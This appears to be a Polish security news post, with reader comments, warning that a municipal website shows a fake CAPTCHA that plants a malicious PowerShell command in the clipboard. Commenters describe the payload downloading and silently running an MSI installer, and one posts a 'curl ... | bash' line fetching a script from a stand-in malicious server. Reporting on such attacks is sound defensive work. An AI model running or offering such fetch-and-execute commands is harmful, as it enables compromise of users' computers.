Konferencja Mega Sekurak Hacking Party w Krakowie – 26-27 października!
Adminie… Czy znamy Twoje grzechy? ;-) Sprawdź!
Konferencja Mega Sekurak Hacking Party w Krakowie – 26-27 października!
Adminie… Czy znamy Twoje grzechy? ;-) Sprawdź!
Tym razem chodzi o stronę gminy Długołęka. Nasz czytelnik poinformował nas o takim incydencie: wchodzisz na stronę gmina[.]dlugoleka[.]pl i od razu pojawia się prośba o potwierdzenie, że jesteś człowiekiem:

No dobra, nie ma tu nic podejrzanego, klikamy dalej a tu coś takiego:

W momencie kliknięcia checkboxu na poprzednim zdjęciu, zainfekowana strona umieściła w schowku systemowym Windows złośliwe polecenie, a teraz chce nas skłonić do tego żebyśmy je uruchomili!
W ten sposób niczego nieświadome ofiary infekują swój komputer. Sam Cloudflare nie uczestniczy w całym procederze – jego logo po prostu zostało umieszczone przez atakujących na grafice wyżej – tak żeby uwiarygodnić całą akcję.
Jak w ogóle do tego doszło? Możliwości jest kilka:
W każdym razie o problemie powiadomiliśmy CERT Polska, który skontaktował się z Gminą.
~ms
😃👍
szkoda, że nie opublikowaliście w trybie graficznym (jako zrzut ekranu) tego złośliwego polecenia
powershell -Command “Update-Brain -Source Sekurak -Daily”
Czemu jako grafika? Czysty tekst.
Dokladnie. Dajcie w komentarzu ten cod ze schowka. Przetestowalbym co robi.
Maskuje adres www w PSie rozbijając go na 3 albo 4 zmienne. Polecenie składa adres w całość poprzez zdefiniowane zmienne do pobrania do f=$env:temp pliku Setup-Full.msi a następnie go odpala z poleceniem -cisza -nieresetuj.
Stajesz się zombie i w najlepszym przypadku kopiesz jakieś coiny.
W najgorszym wrzucają ci node C&C i tylko od operatora zależy co się stanie ;)
A co antywirusami?
I czy nie trzeba miec admina zeby zainstalowac jakies potezne gowno?
pytam teoeretycznie :)
Proszę bardzo: curl -s http://zly-serwer.pl/sh | bash #
Możesz sobie na serwerze wymyśleć jakikolwiek skrypt bashowy, który robi cokolwiek.
Piękne. Nic tylko czekać aż, wraz z rozpowszechnieniem “weryfikacji wieku” (dla twojego dobra!), takie captche zaczną pytać o zdjęcia dowodu :)
Coraz więcej stron jest tak zainfekowanych
teraz mam ten sam przypadek na infospi[.]pl